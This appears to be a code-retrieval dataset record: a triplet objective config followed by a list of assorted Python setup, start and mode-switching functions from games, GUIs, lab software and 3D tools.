        self.setup_type = setup_type
        if (self.setup_type == "position"):
            x, y = ctrl.mouse_pos()
            self.canvas.move(x, y)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setup():\n setFormat()\n setFilename()\n setScreenMode()", "def setup_mode():\n status_label.color = WHITE\n status_label.text = \"-SET-\"\n\n ave_label.color = BLACK # Turn off average label and value display\n ave_value.color = BLACK\n\n max_value.text = str(MAX_RANGE_F) # Display maximum range value\n min_value.text = str(MIN_RANGE_F) # Display minimum range value\n\n time.sleep(0.8) # Show SET status text before setting parameters\n status_label.text = \"\" # Clear status text\n\n param_index = 0 # Reset index of parameter to set\n\n setup_state = \"SETUP\" # Set initial state\n while setup_state == \"SETUP\":\n # Select parameter to set\n setup_state = \"SELECT_PARAM\" # Parameter selection state\n while setup_state == \"SELECT_PARAM\":\n param_index = max(0, min(2, param_index))\n status_label.text = SETUP_COLORS[param_index][0]\n image_group[param_index + 226].color = BLACK\n status_label.color = BLACK\n time.sleep(0.25)\n image_group[param_index + 226].color = SETUP_COLORS[param_index][1]\n status_label.color = WHITE\n time.sleep(0.25)\n\n param_index -= get_joystick()\n\n _buttons = panel.events.get()\n if _buttons and _buttons.pressed:\n if _buttons.key_number == BUTTON_UP: # HOLD button pressed\n param_index = param_index - 1\n if _buttons.key_number == BUTTON_DOWN: # SET button pressed\n param_index = param_index + 1\n if _buttons.key_number == BUTTON_HOLD: # HOLD button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"ADJUST_VALUE\" # Next state\n if _buttons.key_number == BUTTON_SET: # SET button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"EXIT\" # Next state\n\n # Adjust parameter value\n param_value = int(image_group[param_index + 230].text)\n\n while setup_state == \"ADJUST_VALUE\":\n param_value = max(32, min(157, param_value))\n image_group[param_index + 230].text = str(param_value)\n image_group[param_index + 230].color = BLACK\n status_label.color = BLACK\n time.sleep(0.05)\n image_group[param_index + 230].color = SETUP_COLORS[param_index][1]\n status_label.color = WHITE\n time.sleep(0.2)\n\n param_value += get_joystick()\n\n _buttons = panel.events.get()\n if _buttons and _buttons.pressed:\n if _buttons.key_number == BUTTON_UP: # HOLD button pressed\n param_value = param_value + 1\n if _buttons.key_number == BUTTON_DOWN: # SET button pressed\n param_value = param_value - 1\n if _buttons.key_number == BUTTON_HOLD: # HOLD button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"SETUP\" # Next state\n if _buttons.key_number == BUTTON_SET: # SET button pressed\n play_tone(1319, 0.030) # Musical note E6\n setup_state = \"EXIT\" # Next state\n\n # Exit setup process\n status_label.text = \"RESUME\"\n time.sleep(0.5)\n status_label.text = \"\"\n\n # Display average label and value\n ave_label.color = YELLOW\n ave_value.color = YELLOW\n return int(alarm_value.text), int(max_value.text), int(min_value.text)", "def startMode(self):\n raise NotImplementedError('startMode() should be implemented')", "def setUp(self):\r\n self.caption = \"mirra extending classes\" # window name\r\n self.size = 640, 480 #window size\r\n self.pos = 100,100 # window top left location\r\n self.fullScreen = 0 # if fullScreen is on it will overwrite your pos and size to match the display's resolution\r\n self.frameRate = 15 # set refresh framerate\r", "def setup(self):\n # if not system.restore_snapshot():\n # self.log.debug(\"No snapshot to restore, if this is not expected please contact automation team\")\n 
crindsim.set_mode(\"manual\")\n pos.connect()\n pos.sign_on()", "def aimMode_Setup(self, state):\n\n pass", "def renderSetup(style, *args):\n # set up confirm dialog to pop up window to do these things (replace the orig buttons and partial command)\n dial = cmds.confirmDialog(t=\"Render Setup\", message=\"Choose how you'd like to initially setup the current scene:\", button=[\"Generic\", \"Arnold\", \"Maxwell\", \"VRay\", \"Cancel\"])\n\n if dial != \"Cancel\":\n # sets the common setting regarless\n lgt.setCommon()\n\n if dial == \"Arnold\":\n lgt.setArnold()\n if dial == \"Vay\":\n lgt.setVray()\n if dial == \"Maxwell\":\n lgt.setMaxwell()", "def setup():\r\n #this happens just once\r\n size(width, height) #instead of create_canvas\r", "def on_setup_btn(self):\n if self.state == self.INIT:\n self.send_rtsp_request(self.SETUP)", "def setup(self):\n # Create your sprites and sprite lists here\n self.game: Game = Game(SCREEN_WIDTH, SCREEN_HEIGHT, TILE_SIZE, 1, grid_layers = 4)\n self.game.game_message = \"Lead the Rabbit home\"\n\n # show the menu so that we see the instructions\n self.game.menu.button_list[0].text = \"Start\"\n self.game.menu.is_visible = True", "def change_mode(self):\n master.destroy()\n os.system(\"add_mode_run.py\")", "def setup_game(self):", "def setUp(self):\n #if UI object not found. the watcher method will be invoked\n d.watcher('AUTO_FC_WHEN_ANR').when(text='ANR').when(text='强行关闭') .press('enter')\n d.wakeup() #wakeup device ", "def setup_pymol():\n pymol.finish_launching() # Prevent threading errors\n # Configure global settings\n cmd.set('scene_buttons', 1)\n cmd.set('matrix_mode', 1)\n cmd.set('movie_panel', 1)\n # Configure quality settings\n cmd.mset(\"1 x500\")\n cmd.set('ray_trace_frames', 1)\n cmd.viewport(800, 800)", "def setup(self): \n # Navigate to POS screen\n pos.connect()", "def screen_setup(screen_size):\n window = turtle.Screen()\n window.bgcolor(\"black\")\n window.title(\"Maze Game\")\n window.setup(screen_size, screen_size)", "def _display_setup(self):\r\n display_file = \"{}/display.json\".format(self.settings_dir)\r\n with open(display_file) as json_file:\r\n win_settings = json.load(json_file)\r\n self.win = visual.Window(**win_settings)\r\n framerate = self.win.fps()\r\n self.frame_duration = 1.0/framerate\r\n self.mouse = event.Mouse(visible=False, win=self.win)", "def do_activate(self, *args, **kwargs):\n self.register_signals()\n self.perform_setup()\n assert self.main_window\n self.main_window.show()\n self.hold()", "def start_new_game(self, mode): \n self.display.clear() \n #self.ui.hide()\n if self.selected_speed == \"speed Slow\":\n self.game_manager.set_players_speed(1.9)\n elif self.selected_speed == \"speed Medium\":\n self.game_manager.set_players_speed(3)\n elif self.selected_speed == \"speed Fast\":\n self.game_manager.set_players_speed(5)\n self.game_manager = GameManager(self.display, self.ui, mode, GameState.Running, self.game_manager.player1, self.game_manager.player2)", "def start(self):\r\n self.setDriver('ST', 1)", "def ready(self):\r\n\t\t# Remove attract mode from mode queue - Necessary?\r\n\t\tself.game.modes.remove(self)\r\n\t\t# Initialize game\t\r\n\t\tself.game.start_game()\r\n\t\t# Add the first player\r\n\t\tself.game.add_player()\r\n #self.game.add_player()\r\n\t\t# Start the ball. 
This includes ejecting a ball from the trough.\r\n\t\tself.game.start_ball()", "def onClick(self):\n self.app.setActiveMode(\"start\")", "def start(self):\n self.active = True", "def start(self):\n # asserts preconditions are met\n #assert self.validGameSettings()\n\n #draws initial welcome screen\n #self._text = GLabel(text=\"Press 'S' to Play\")\n #self._text.draw(self.view)\n\n # initializing instance variables\n self.setState(STATE_INACTIVE)\n self.setWave(None)\n self.setText(None)\n self.lastkeys = 0 #ADD MORE ATTRIBUTES\n\n # draws iniital welcome screen\n self.welcomeScreen()", "def setup_callback():\n self.setup_window.deiconify()", "def on_pre_enter(self):\n self.setup()\n self.start()", "def enable_setup(self):\n self.high_ver_entry.config(state=\"normal\")\n self.low_ver_entry.config(state=\"normal\")\n self.left_hor_entry.config(state=\"normal\")\n self.right_hor_entry.config(state=\"normal\")", "def enable_start(self, *args):\n but_start.configure(state=GL.NORMAL)", "def open(self):\n windowFlags = self.getWindowFlags(self.settings)\n self.surface = pygame.display.set_mode(self._resolution, windowFlags)\n self._printVideoInfo(pygame.display.Info())\n logger.info(\"Initialized display with driver: \" + pygame.display.get_driver())\n\n self.surface.fill(self._skin.guiColor(\"Background\"))\n self._initializePanels(self._resolution, self._skin)\n pygame.display.flip()\n\n self._statusLoop.statusProvider = self.getStatusProvider(self.settings)", "def setupNewGame(self):\r\n self.level = 1\r\n self.num_cows = 2\r\n self.num_farmers = 1\r\n self.levelHeading = Text(self.gameDisplay, 120, 425, 175, self.light_orange, \"Farm 1\")\r\n self.shield_indicator.image = self.greenShield\r\n updatedHeading = self.levelHeading\r\n self.startUX[0] = updatedHeading", "def setup_window(self, fullscreen, dual):\n cv2.startWindowThread()\n if fullscreen:\n cv2.namedWindow(self.wname, cv2.WINDOW_NORMAL)\n else:\n cv2.namedWindow(self.wname)\n cv2.namedWindow(self.wname)\n cv2.setWindowProperty(self.wname, cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n\n if dual:\n # Move is to make sure it's on the right monitor\n cv2.moveWindow(self.wname, 1920, 0)\n cv2.namedWindow(self.wname + ' Small View')\n cv2.resizeWindow(self.wname + ' Small View', 960, 540)", "def snakeSetup(self,display):\n if display:\n self.screen = pygame.display.set_mode(windowSize)\n pygame.display.set_caption('Snake!')\n pygame.init()\n self.clock = pygame.time.Clock()\n self.dir = left #round(3 * random.random())\n self.s = snake(playerColor, unitSize,self.dir)\n self.setup = True", "def set_preset_mode(self,filename):\n try:\n self.mainwindow.setVisible(False)\n for area in self.dockarea.tempAreas:\n area.window().setVisible(False)\n\n self.splash_sc.show()\n QtWidgets.QApplication.processEvents()\n self.splash_sc.raise_()\n self.splash_sc.showMessage('Loading Modules, please wait',color = Qt.white)\n QtWidgets.QApplication.processEvents()\n self.clear_move_det_controllers()\n QtWidgets.QApplication.processEvents()\n\n\n move_modules, detector_modules= self.set_file_preset(filename)\n self.update_status('Preset mode ({}) has been loaded'.format(os.path.split(filename)[1]),log_type='log')\n self.settings.child('loaded_files', 'preset_file').setValue(os.path.split(filename)[1])\n self.move_modules = move_modules\n self.detector_modules = detector_modules\n\n ######################################################################\n #set scan selector\n items = OrderedDict()\n if self.navigator is not None:\n items[\"Navigator\"] = 
dict(viewers=[self.navigator.viewer], names=[\"Navigator\"])\n for det in self.detector_modules:\n if len([view for view in det.ui.viewers if view.viewer_type=='Data2D']) != 0:\n items[det.title] = dict(viewers=[view for view in det.ui.viewers if view.viewer_type == 'Data2D'],\n names=[view.title for view in det.ui.viewers if view.viewer_type == 'Data2D'],)\n items[\"DAQ_Scan\"] = dict(viewers=[self.ui.scan2D_graph], names=[\"DAQ_Scan\"])\n\n if self.navigator is not None:\n items = OrderedDict(Navigator=dict(viewers=[self.navigator.viewer], names=[\"Navigator\"]))\n items.update(self.scanner.scan_selector.viewers_items)\n\n self.scanner.viewers_items = items\n\n self.scanner.scan_selector.widget.setVisible(False)\n self.scanner.scan_selector.settings.child('scan_options', 'scan_type').hide()\n\n self.scanner.scan_selector.widget.setVisible(False)\n self.scanner.scan_selector.show_scan_selector(visible=False)\n\n #####################################################\n self.overshoot_manager = OvershootManager(det_modules=[det.title for det in detector_modules], move_modules=[move.title for move in move_modules])\n #load overshoot if present\n file = os.path.split(self.preset_file)[1]\n path = os.path.join(overshoot_path, file)\n if os.path.isfile(path):\n self.set_overshoot_configuration(path)\n\n\n #connecting to logger\n for mov in move_modules:\n mov.log_signal[str].connect(self.add_log)\n mov.init_signal.connect(self.update_init_tree)\n for det in detector_modules:\n det.log_signal[str].connect(self.add_log)\n det.init_signal.connect(self.update_init_tree)\n #setting moves and det in tree\n preset_items_det=[]\n preset_items_move=[]\n items_det=[module.title for module in detector_modules]\n if items_det!=[]:\n preset_items_det=[items_det[0]]\n\n items_move=[module.title for module in move_modules]\n if items_move!=[]:\n preset_items_move=[items_move[0]]\n\n self.settings.child('Move_Detectors', 'Detectors').setValue(dict(all_items=items_det, selected=preset_items_det))\n self.settings.child('Move_Detectors', 'Moves').setValue(dict(all_items=items_move, selected=preset_items_move))\n self.settings.child('scan_options', 'plot_from').setLimits(preset_items_det)\n if preset_items_det!=[]:\n self.settings.child('scan_options', 'plot_from').setValue(preset_items_det[0])\n\n self.splash_sc.close()\n self.mainwindow.setVisible(True)\n for area in self.dockarea.tempAreas:\n area.window().setVisible(True)\n self.show_average_dock(False)\n\n self.ui.scan_dock.setEnabled(True)\n self.file_menu.setEnabled(True)\n self.settings_menu.setEnabled(True)\n self.overshoot_menu.setEnabled(True)\n\n self.create_new_file(True)\n self.update_init_tree()\n\n except Exception as e:\n\n self.update_status(getLineInfo()+ str(e), self.wait_time, log_type='log')", "def setupWindow(self):\n\n\t\tself.main_menu_window = MenuFrame.MainMenuFrame(self.uiCoordinator)\n\t\tself.menu_window = self.main_menu_window._mf\n\t\tself.score_window = self.main_menu_window._hf\n\t\tself.instructions_window = self.main_menu_window._if\n\t\tself.menu_window.playButton.focus_set()", "def setup():\n size(SPACE['w'], SPACE['h'])\n colorMode(RGB, 1)", "def gamemode_startscreen(self) -> None:\n self.__draw_startscreen()", "def __init__(self, s_width, s_height, setup):\n pygame.init()\n pygame.font.init()\n\n self.arcade = False\n fullscreen = False\n for opt in setup:\n if opt == Setup.Arcade:\n self.arcade = True\n elif opt == Setup.Fullscreen:\n fullscreen = True\n \n self.joysticks = [pygame.joystick.Joystick(x) for x in 
range(pygame.joystick.get_count())]\n for j in self.joysticks:\n j.init()\n\n self.display = Display((s_width, s_height), fullscreen)\n self.clock = pygame.time.Clock()\n self.FPS = 60\n\n self.ui = UI(self. display)\n if self.arcade:\n if len(self.joysticks) == 0: \n print(\"=================== plug in the controller ===================\") \n exit(1)\n self.ui.enable_arcade_mode()\n \n self.selected_speed = \"speed Medium\"\n self.game_manager = GameManager(self.display, self.ui, GameMode.EatToGrow, GameState.Menu)", "def setup(self, args={}):\n\n return Status.RUN", "def main():\n run_it = tools.Control(prepare.ORIGINAL_CAPTION)\n state_dict = {\"SPLASH\" : splash.Splash(),\n \"MENU\" : menu.Menu(),\n \"DEMO\" : demo.Demo(),\n \"GAME\" : game.Game()}\n run_it.setup_states(state_dict, \"SPLASH\")\n run_it.main()", "def run():\r\n autostartup()", "def main():\n root = Tk()\n if high_dpi:\n root.call('tk', 'scaling', 4)\n if fullscreen:\n root.attributes('-fullscreen', True)\n root.configure(bg=yellow)\n root.grid_columnconfigure(2, weight=1)\n root.title('NS Fietsenstalling')\n\n MainScreen(root)\n root.mainloop()", "def startMode(self):\n return True, None", "def setupWidget(self):\r\n self.generateCoordinates()\r\n self.modifyCoordinateLists()\r\n self.settings.movementMatrix = self.movementMatrix\r\n self.settings.ghostIntersectionList = self.ghostIntersectionList\r\n self.createBodies()\r\n print(\"GameW set\")", "def setup_screen():\n screen = Screen()\n screen.setup(width=600, height=600)\n screen.bgcolor(\"black\")\n screen.title(\"My Snake Game\")\n screen.tracer(0)\n return screen", "def qsetup(format='screen', filename='dis.out'):\n setFormat(format)\n setFilename(filename)\n setScreenMode()\n initialize()", "def setup(self):\n # Initialize the drawing environment (create main windows, etc)\n glutInit(sys.argv)\n glutInitDisplayMode(GLUT_SINGLE | GLUT_RGB | GLUT_DEPTH)\n glutInitWindowSize(WINDOW_WIDTH, WINDOW_HEIGHT)\n glutCreateWindow(name)\n\n glShadeModel(GL_SMOOTH)\n\n glClearDepth(1.0)\n glDepthFunc(GL_LESS) # The Type Of Depth Test To Do\n glEnable(GL_DEPTH_TEST) # Enables Depth Testing\n glShadeModel(GL_SMOOTH) # Enables Smooth Color Shading\n\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity() # Reset The Projection Matrix\n\n # Calculate The Aspect Ratio Of The Window\n gluPerspective(45.0, float(WINDOW_WIDTH)/float(WINDOW_HEIGHT), 0.1, 100.0)\n\n glMatrixMode(GL_MODELVIEW)\n\n # Set up keyboard listeners.\n glutKeyboardFunc(self.on_key)", "def setup(self):\n self.ui.setup_window()", "def on_start(self):\n self.init()", "def init_modes(self):\n self._verify_not_using_threaded_mpm()\n\n self._init_screenshot_mode()\n self._init_debug_mode()\n self._init_webapi_cors_header()\n self.init_theme()", "def main_loop():\n window = pygame.display.set_mode((640,480))\n pygame.init()\n running = True\n while running:\n model = TronModel(10,640,480)\n view = PyGameWindowView(model,640,480)\n controller = KeyControl(model)\n end_start = False\n end_mode_setup = False\n end_player_setup = False\n game_over = False\n\n while not end_start:\n view.start_screen()\n for event in pygame.event.get():\n if event.type == QUIT: #if the window is closed, break out of the two while loops and go to pygame.quit()\n running = False\n end_start = True\n end_mode_setup = True\n end_player_setup = True\n game_over = True\n if controller.handle_event(event):\n controller.end_start = True\n end_start = True\n\n while not end_mode_setup:\n view.mode_setup()\n for event in pygame.event.get():\n if 
event.type == QUIT:\n running = False\n end_mode_setup = True\n end_player_setup = True\n game_over = True\n if controller.handle_mode_setup(event):\n controller.end_mode_setup = True\n end_mode_setup = True\n\n while not end_player_setup:\n if model.mode == \"single\":\n model.num_players = 1\n view.single_player_setup()\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n end_player_setup = True\n game_over = True\n if controller.handle_single(event):\n model.init_players()\n controller.end_player_setup = True\n end_player_setup = True\n if model.mode == \"multi\":\n end_multi1 = False\n while not end_multi1:\n view.multi_player_setup1()\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n end_player_setup = True\n end_multi1 = True\n end_multi2 = True\n game_over = True\n if controller.handle_multi1(event):\n controller.end_multi1 = True\n end_multi1 = True\n if model.num_players == 4:\n end_multi2 = True\n else:\n end_multi2 = False\n while not end_multi2:\n view.multi_player_setup2()\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n end_player_setup = True\n end_multi2 = True\n game_over = True\n if controller.handle_multi2(event):\n controller.end_multi2 = True\n end_multi2 = True\n model.init_players()\n end_player_setup = True\n\n view._init_draw()\n controller.game_start = True\n while not game_over:\n for event in pygame.event.get():\n if event.type == QUIT: #if the window is closed, break out of the two while loops and go to pygame.quit()\n running = False\n game_over = True\n if controller.handle_event(event): #checks to see if the game has ended and the spacebar was pressed, if yes then the inner loop is broken and the game is reinitialized\n game_over = True\n controller.handle_event(event) #handles regular keypress events\n model.update()\n view.draw()\n time.sleep(.1)\n\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n pygame.quit()", "def activate(self):\n self.start()", "def appStarted(self):\n self.color1=self.app.colorset[0]\n self.color2=self.app.colorset[1]\n self.color3=self.app.colorset[2]\n self.rows=6\n self.cols=6\n self.squaresize=800\n self.piecesize=int(self.squaresize/self.cols)\n self.square=([[0]*self.cols for row in range(self.rows)])\n self.side=[0]*self.cols\n \n self.doubleclick=None\n self.temp=None\n self.s=None\n self.imagesize=self.squaresize\n self.image=self.loadImage('level4.png')\n w,h=self.image.size\n scale=min(w,h)\n self.image=self.scaleImage(self.image,self.imagesize/scale)\n self.image=self.image.crop((0,0,self.squaresize,self.squaresize))\n self.imageW,self.imageH=self.image.size\n self.smol=self.scaleImage(self.image,300/scale)\n\n self.pieces=self.createPiece()\n self.pieces.shuffle()\n self.start=False\n self.timer=0\n self.timers=0\n self.timerm=0", "def setup(client):\n client.add_cog(ProcessDisplay(client))", "def guiMode(options):\n configuration = {'config_project_name': 'untitled', 'config_address': '0.0.0.0',\n 'config_port': 8081, 'config_multiple_instance': True, 'config_enable_file_cache': True,\n 'config_start_browser': True, 'config_resourcepath': './res/'}\n start(MainWindow, address=configuration['config_address'], port=configuration['config_port'],\n multiple_instance=configuration['config_multiple_instance'],\n enable_file_cache=configuration['config_enable_file_cache'],\n start_browser=configuration['config_start_browser'])", "def switch_state():\n\tDmg.OpenWindow()", "def setup(self):\n 
build_world.start_level(self)", "def setup(self):\n self.profile = config.get(\"profile\")\n ui.command(\":cache_show.x__text\", config.get(\"pacman_cache\"))\n\n ulm = (config.get(\"uselocalmirror\") != \"\")\n ui.command(\":mirrorlist.opton\", config.get(\"usemirrorlist\") != \"\")\n ui.command(\":mirrorlist.enable\", not ulm)\n ui.command(\":use_local_mirror.opton\", ulm)\n ui.command(\":local_mirror.x__text\", config.get(\"localmirror\"))\n return True", "def main():\n setup(**setup_params)", "def run():\r\n autostartup()\r\n\r\n if settings.FEATURES.get('USE_CUSTOM_THEME', False):\r\n enable_theme()\r\n\r\n if settings.FEATURES.get('USE_MICROSITES', False):\r\n enable_microsites()\r\n\r\n if settings.FEATURES.get('ENABLE_THIRD_PARTY_AUTH', False):\r\n enable_third_party_auth()", "def start(self):\n return self.setup.start", "def mode_manual(self):\n if self.__check_mode_change():\n self.communications.set_status(\"Piloting Bot\")\n self.__check_move()", "def start(setup):\n run.run_name = setup.entry_run_name.get()\n run.num_cpus = setup.entry_cpus.get()\n run.medium_volume = setup.entry_medium.get()\n run.sim_time = setup.entry_sim_time.get()\n run.timestep = setup.entry_timestep.get()\n run.pop_size = setup.entry_pop_size.get()\n run.death_per_gen = setup.entry_num_deaths.get()\n run.iterations = setup.entry_iter.get()\n run.output_dir = setup.entry_output.get()\n run.pfba = False if setup.var_pfba.get() is 0 else True\n run.enforce_growth = False if setup.var_growth.get() is 0 else True\n run.oxigen = False if setup.var_oxigen.get() is 0 else True\n run.mutation_chance = setup.entry_mutation_chance.get()\n run.deletion_chance = setup.entry_deletion_chance.get()\n run.repeats = setup.entry_repeats.get()\n run.death_rate = setup.entry_death_rate.get()\n run.mutation_freq = setup.entry_mutation_freq.get()\n run.deletion_freq = setup.entry_deletion_freq.get()\n run.crossover_freq = setup.entry_crossover_freq.get()\n run.twopoint = False if setup.var_twopoint is 0 else True\n run.chromosome = setup.entry_chromosome.get()\n run.solver = setup.solver_var.get()\n\n\n if run.mutation_freq + run.deletion_freq + run.crossover_freq != 1:\n print(f\"Mutation: {run.mutation_freq} + Deletion: {run.deletion_freq} + Crossover: {run.crossover_freq} is not eaqual to 1\")\n return\n\n if not os.path.isdir(run.output_dir):\n print(f\"'{run.output_dir}' is not a valid directory\")\n return\n\n if run.chromosome == '':\n run.chromosome = None\n else:\n if not os.path.isfile(run.chromosome):\n print(f\"'{run.chromosome}' does not exist\")\n return\n\n objective = {}\n data_watcher = DataWatcher()\n data_watcher.set_oxygen(run.oxigen)\n data_watcher.set_enforce_growth(run.enforce_growth)\n data_watcher.set_pfba(run.pfba)\n data_watcher.set_death_rate(run.death_rate)\n culture = Culture()\n culture.register_data_watcher(data_watcher)\n\n if len(setup.widgets) < 2:\n print(\"Less than two Species added\")\n return\n\n run.objective = objective\n run.culture = culture\n\n run_page = RunPage(app.container, app)\n run_page.grid(row=0, column=0, sticky=\"nsew\")\n run.graph_page = run_page\n\n run_page.tkraise()\n\n for widget in setup.widgets:\n objective[widget.species.entry_name.get()] = widget.entry_objective.get()\n model = widget.species.entry_model.get()\n if not os.path.isfile(model):\n print(f\"Can not find file: {model}\")\n return\n\n if run.graph_page != None:\n from tkinter import END, DISABLED, NORMAL\n run.graph_page.text.config(state=NORMAL)\n run.graph_page.text.insert(END, f\"Loading Model of 
Species: {widget.species.entry_name.get()}\\n\")\n run.graph_page.text.config(state=DISABLED)\n\n print(f\"Loading Model of Species: {widget.species.entry_name.get()}\")\n species = Species(widget.species.entry_name.get(), model, widget.species.entry_radius.get(), widget.species.entry_dryweight.get(), run.solver.lower())\n culture.innoculate_species(species, widget.species.entry_innoculation.get())\n\n run.start_process()", "def setup(self, callback=False, display=\"lcd\"):\n self.display_medium = display\n self._setup_gpio_in()\n if callback:\n self._add_event_detect()\n self._add_event_callback()", "def run(self):\r\n\r\n # If any of the test constructors update the settings, reflect\r\n # those changes on the GUI before running\r\n if GUIEnabled:\r\n self.gui_table.updateGUI(self.settings)\r\n self.clock = pygame.time.Clock()\r\n self.screen.fill((0, 0, 0))\r\n\r\n # Run the simulation loop\r\n self.SimulationLoop([0, 0, 0])\r\n\r\n if GUIEnabled and self.settings.drawMenu:\r\n self.gui_app.paint(self.screen)\r\n\r\n pygame.display.flip()\r\n self.clock.tick(self.settings.hz)\r\n self.fps = self.clock.get_fps()", "def onSpawn(self):\n self.spawned = True\n self._interactor.initialiseDevices()", "def start(self):\n self.reset()\n self.on_start()", "def setup(self):\n setup = RandomWordGenerator().get()\n self.formatted_word = ConvertWord().convert_to_dict(setup)\n self.underscore_word = HangmanUnderscoreDiagram(\n setup).create_hidden_word()\n self.failed_guesses = 0\n print(\"Hello\")\n self.has_won = False\n self.start_game(True)", "def main():\n\n window = ArcadeButWithStuff(screen_h=920, screen_w=1080)\n\n window.setup()\n arcade.run()", "def __run(self):\n # init snake show\n self.__init_snake()\n self.__introduction.hide()\n # start ticktock for snake moving\n self.__ticker.start()\n # enable key press\n self.__enable_key = True", "def set_manual_mode(self):\n self._kernel.set_manual_mode()", "def setup(self):\n \n # Define ui file to be used as a graphical interface\n # This file can be edited graphically with Qt Creator\n # sibling_path function allows python to find a file in the same folder\n # as this python module\n self.ui_filename = sibling_path(__file__, \"ant_watch_plot.ui\")\n \n #Load ui file and convert it to a live QWidget of the user interface\n self.ui = load_qt_ui_file(self.ui_filename)\n\n # Measurement Specific Settings\n # This setting allows the option to save data to an h5 data file during a run\n # All settings are automatically added to the Microscope user interface\n self.settings.New('save_video', dtype = bool, initial = False)\n self.settings.New('track_ant',dtype = bool, initial = False)\n self.settings.New('pixel_size', dtype = float, initial = 0.05547850208, ro = True)\n self.settings.New('binning', dtype = int, initial = 16, ro = True)\n self.settings.New('threshold', dtype = int, initial = 85, ro = False)\n self.settings.New('proportional', dtype = float, initial = 0.12, ro = False)\n self.settings.New('integral', dtype = float, initial = 0, ro = False)\n self.settings.New('derivative', dtype = float, initial = 0.05, ro = False)\n \n # x and y is for transmitting signal\n self.settings.New('x',dtype = float, initial = 32, ro = True, vmin = 0, vmax = 63.5)\n self.settings.New('y',dtype = float, initial = 32, ro = True, vmin = 0, vmax = 63.5)\n \n # Define how often to update display during a run\n self.display_update_period = 0.01\n \n \n # Convenient reference to the hardware used in the measurement\n self.track_cam = self.app.hardware['track_cam']\n 
self.wide_cam = self.app.hardware['wide_cam']\n self.recorder = self.app.hardware['flirrec']\n self.daqmotor = self.app.hardware['daqmotor']\n \n #setup experiment condition\n self.track_cam.settings.frame_rate.update_value(50)\n self.track_cam.read_from_hardware()", "def start(self):\n self.__init__()\n self.set_n_players()\n self.init_players()\n self.init_territory_selection_phase()\n self.init_troop_deployment_phase()\n # self.game_phase()", "def maya_start_up():\n import maya.utils as mu\n mu.executeDeferred(\"import mliber;reload(mliber);mliber.show_in_maya()\")", "def setup_while_running(info: PluginInfo) -> None:\n info.status = Status.LOADING\n\n dummy_parser = argparse.ArgumentParser()\n _run_setup_argument_parser_function(info, dummy_parser)\n if info.status != Status.LOADING: # error\n return\n\n _run_setup_and_set_status(info)\n assert info.status != Status.LOADING\n if info.status == Status.ACTIVE:\n get_main_window().event_generate(\"<<PluginsLoaded>>\")", "def startup(self):\n pass", "def setup(self):\n curses.curs_set(1)\n curses.noecho()\n curses.cbreak()\n # Keypad disabled until scrolling properly implemented\n # self.stdscr.keypad(True)\n self.stdscr.clear()\n self.stdscr.addstr(\"SecureChat v{}\".format(__version__))\n self.chat_container.box()\n self.chat_win.addstr(\"Welcome to SecureChat!\")\n self.chat_win.scrollok(True)\n self.chat_win.setscrreg(0, self.max_y - 5)\n self.prompt_win.addstr(\"> \")\n self.refresh_all()", "def start_game(self):\n self.board = Board(num_tableaus=self.tableau_qty, num_decks=self.decks, deal_3=self.deal_3)\n self.board.init_move_dict()\n self.board.deal(self.deck)\n\n if self.api_use:\n self.init_game_api()\n elif self.commandline:\n self.init_cl_game()\n else:\n self.init_pygame()", "def start_preparation(self):\n from managers.buttons_manager import ButtonsManager\n ButtonsManager(self).begin()", "def set_mode(self, size, *args, **kwargs):\n if env.japplet:\n self.jframe = env.japplet\n else:\n self.jframe = Frame(self.caption, size)\n if self.icon:\n self.jframe.setIconImage(self.icon)\n env.jframe = self.jframe\n self.jpanel = self.jframe.jpanel\n self.surface = self.jpanel.surface\n self.surface._display = self\n self._surfaceRect = self.surface.get_rect()\n self._surface_rect = [self._surfaceRect]\n self._rect_list = None\n self.jframe.setLocationRelativeTo(None)\n self.jframe.setVisible(True)\n self._warmup()\n return self.surface", "def __load_mode_ui(self, new_list):\n self.__add_mode_button()\n if self.__ui_mode == UImode.CANVASCONTROL:\n self.__setup_ui_controls(new_list)\n elif self.__ui_mode == UImode.TEACHPANEL:\n self.__setup_joint_sliders()\n else:\n self.scene.append_to_caption(\"UNKNOWN MODE ENTERED\\n\")", "def setup(self):\n \n # Define ui file to be used as a graphical interface\n # This file can be edited graphically with Qt Creator\n # sibling_path function allows python to find a file in the same folder\n # as this python module\n self.ui_filename = sibling_path(__file__, \"lick_training_plot.ui\")\n \n #Load ui file and convert it to a live QWidget of the user interface\n self.ui = load_qt_ui_file(self.ui_filename)\n\n # Measurement Specific Settings\n # This setting allows the option to save data to an h5 data file during a run\n # All settings are automatically added to the Microscope user interface\n self.settings.New('save_h5', dtype=bool, initial=False)\n self.settings.New('tdelay', dtype=int, initial=0,ro=True)\n self.settings.New('trial_time',dtype=int,initial=10,ro=False)\n 
self.settings.New('lick_interval', dtype=int, initial=1,ro=False)\n self.settings.New('water_reward', dtype=bool, initial=False,ro=False)\n self.settings.New('total_drops', dtype=int, initial=0,ro=False)\n self.settings.New('save_movie', dtype=bool, initial=False,ro=False)\n self.settings.New('movie_on', dtype=bool, initial=False,ro=True)\n #self.settings.New('sampling_period', dtype=float, unit='s', initial=0.005)\n \n # Create empty numpy array to serve as a buffer for the acquired data\n #self.buffer = np.zeros(10000, dtype=float)\n \n # Define how often to update display during a run\n self.display_update_period = 0.04 \n \n # Convenient reference to the hardware used in the measurement\n self.daq_ai = self.app.hardware['daq_ai']\n self.arduino_sol = self.app.hardware['arduino_sol']\n self.water=self.app.hardware['arduino_water']\n self.camera=self.app.hardware['camera']", "def __toggle_mode(self):\n # Update mode\n # Update mode, default canvas controls\n self.__ui_mode = {\n UImode.CANVASCONTROL: UImode.TEACHPANEL,\n UImode.TEACHPANEL: UImode.CANVASCONTROL\n }.get(self.__ui_mode, UImode.CANVASCONTROL)\n\n # Update UI\n # get list of robots\n new_list = []\n for name in self.__ui_controls.get('menu_robots').choices:\n new_list.append(name)\n\n self.__reload_caption(new_list)", "def setup(self):\n\n self._enable_torque(self._reg.TORQUE_ENABLE)\n 